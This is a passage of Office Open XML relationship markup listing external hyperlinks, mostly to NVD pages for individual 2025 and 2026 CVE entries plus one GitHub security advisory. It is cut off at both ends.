Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75160" TargetMode="External" Id="rId192" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75431" TargetMode="External" Id="rId193" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75595" TargetMode="External" Id="rId194" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75746" TargetMode="External" Id="rId195" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78327" TargetMode="External" Id="rId196" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78328" TargetMode="External" Id="rId197" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79571" TargetMode="External" Id="rId198" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80181" TargetMode="External" Id="rId199" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81939" TargetMode="External" Id="rId200" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85043" TargetMode="External" Id="rId201" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86729" TargetMode="External" Id="rId202" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86840" TargetMode="External" Id="rId203" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53581" TargetMode="External" Id="rId204" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66768" TargetMode="External" Id="rId205" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69854" TargetMode="External" Id="rId206" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82021" TargetMode="External" Id="rId207" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85982" TargetMode="External" Id="rId208" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-30156" TargetMode="External" Id="rId209" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50093" TargetMode="External" Id="rId210" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-5706" TargetMode="External" Id="rId211" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86165" TargetMode="External" Id="rId212" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-rgj7-g3m4-5g8c" TargetMode="External" Id="rId213" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-9049" TargetMode="External" Id="rId214" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12648" TargetMode="External" Id="rId215" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12651" TargetMode="External" Id="rId216" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13761" TargetMode="External" Id="rId217" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14828" TargetMode="External" Id="rId218" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16502" TargetMode="External" Id="rId219" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18198" TargetMode="External" Id="rId220" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18341" TargetMode="External" Id="rId221" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18480" TargetMode="External" Id="rId222" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18851" TargetMode="External" Id="rId223" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19887" TargetMode="External" Id="rId224" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28609" TargetMode="External" Id="rId225" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28618" TargetMode="External" Id="rId226" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28666" TargetMode="External" Id="rId227" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-30754" TargetMode="External" Id="rId228" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-39944" TargetMode="External" Id="rId229" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49879" TargetMode="External" Id="rId230" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49882" TargetMode="External" Id="rId231" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-51974" TargetMode="External" Id="rId232" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52691" TargetMode="External" Id="rId233" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52775" TargetMode="External" Id="rId234" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55521" TargetMode="External" Id="rId235" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62706" TargetMode="External" Id="rId236" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62744" TargetMode="External" Id="rId237" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62895" TargetMode="External" Id="rId238" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65772" TargetMode="External" Id="rId239" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66814" TargetMode="External" Id="rId240" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66818" TargetMode="External" Id="rId241" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66819" TargetMode="External" Id="rId242" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66820" TargetMode="External" Id="rId243" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67368" TargetMode="External" Id="rId244" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67370" TargetMode="External" Id="rId245" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67373" TargetMode="External" Id="rId246" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67380" TargetMode="External" Id="rId247" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67381" TargetMode="External" Id="rId248" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67384" TargetMode="External" Id="rId249" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67385" TargetMode="External" Id="rId250" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67388" TargetMode="External" Id="rId251" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67631" TargetMode="External" Id="rId252" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67638" TargetMode="External" Id="rId253" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67639" TargetMode="External" Id="rId254" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67642" TargetMode="External" Id="rId255" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67643" TargetMode="External" Id="rId256" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68775" TargetMode="External" Id="rId257" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68786" TargetMode="External" Id="rId258" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68828" TargetMode="External" Id="rId259" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69266" TargetMode="External" Id="rId260" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69268" TargetMode="External" Id="rId261" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69273" TargetMode="External" Id="rId262" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69282" TargetMode="External" Id="rId263" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69285" TargetMode="External" Id="rId264" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69291" TargetMode="External" Id="rId265" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69334" TargetMode="External" Id="rId266" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69355" TargetMode="External" Id="rId267" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69360" TargetMode="External" Id="rId268" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69386" TargetMode="External" Id="rId269" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69434" TargetMode="External" Id="rId270" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69439" TargetMode="External" Id="rId271" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69442" TargetMode="External" Id="rId272" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69461" TargetMode="External" Id="rId273" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69464" TargetMode="External" Id="rId274" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69465" TargetMode="External" Id="rId275" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69485" TargetMode="External" Id="rId276" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69494" TargetMode="External" Id="rId277" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69495" TargetMode="External" Id="rId278" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69499" TargetMode="External" Id="rId279" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69511" TargetMode="External" Id="rId280" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69518" TargetMode="External" Id="rId281" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69522" TargetMode="External" Id="rId282" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69529" TargetMode="External" Id="rId283" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69547" TargetMode="External" Id="rId284" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69551" TargetMode="External" Id="rId285" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69556" TargetMode="External" Id="rId286" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69598" TargetMode="External" Id="rId287" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69601" TargetMode="External" Id="rId288" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69603" TargetMode="External" Id="rId289" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69614" TargetMode="External" Id="rId290" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69628" TargetMode="External" Id="rId291" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69629" TargetMode="External" Id="rId292" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69632" TargetMode="External" Id="rId293" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69649" TargetMode="External" Id="rId294" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69669" TargetMode="External" Id="rId295" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69671" TargetMode="External" Id="rId296" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69676" TargetMode="External" Id="rId297" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69678" TargetMode="External" Id="rId298" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69686" TargetMode="External" Id="rId299" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69712" TargetMode="External" Id="rId300" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69716" TargetMode="External" Id="rId301" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69722" TargetMode="External" Id="rId302" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69724" TargetMode="External" Id="rId303" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69729" TargetMode="External" Id="rId304" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69740" TargetMode="External" Id="rId305" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69742" TargetMode="External" Id="rId306" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69759" TargetMode="External" Id="rId307" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69764" TargetMode="External" Id="rId308" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69767" TargetMode="External" Id="rId309" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69772" TargetMode="External" Id="rId310" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69778" TargetMode="External" Id="rId311" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69784" TargetMode="External" Id="rId312" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69797" TargetMode="External" Id="rId313" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69860" TargetMode="External" Id="rId314" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70178" TargetMode="External" Id="rId315" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70203" TargetMode="External" Id="rId316" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70351" TargetMode="External" Id="rId317" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70586" TargetMode="External" Id="rId318" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71328" TargetMode="External" Id="rId319" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71336" TargetMode="External" Id="rId320" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71352" TargetMode="External" Id="rId321" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71963" TargetMode="External" Id="rId322" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72933" TargetMode="External" Id="rId323" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72940" TargetMode="External" Id="rId324" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72950" TargetMode="External" Id="rId325" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72959" TargetMode="External" Id="rId326" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72960" TargetMode="External" Id="rId327" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72972" TargetMode="External" Id="rId328" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72973" TargetMode="External" Id="rId329" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72986" TargetMode="External" Id="rId330" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73006" TargetMode="External" Id="rId331" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73012" TargetMode="External" Id="rId332" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73013" TargetMode="External" Id="rId333" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73016" TargetMode="External" Id="rId334" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73018" TargetMode="External" Id="rId335" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73023" TargetMode="External" Id="rId336" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73028" TargetMode="External" Id="rId337" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76647" TargetMode="External" Id="rId338" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76851" TargetMode="External" Id="rId339" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77105" TargetMode="External" Id="rId340" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77106" TargetMode="External" Id="rId341" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77480" TargetMode="External" Id="rId342" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77481" TargetMode="External" Id="rId343" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77482" TargetMode="External" Id="rId344" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77483" TargetMode="External" Id="rId345" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77484" TargetMode="External" Id="rId346" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77486" TargetMode="External" Id="rId347" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77487" TargetMode="External" Id="rId348" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77495" TargetMode="External" Id="rId349" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77504" TargetMode="External" Id="rId350" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77826" TargetMode="External" Id="rId351" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77901" TargetMode="External" Id="rId352" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77906" TargetMode="External" Id="rId353" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77907" TargetMode="External" Id="rId354" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77908" TargetMode="External" Id="rId355" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78074" TargetMode="External" Id="rId356" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78439" TargetMode="External" Id="rId357" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78442" TargetMode="External" Id="rId358" /><Relationship 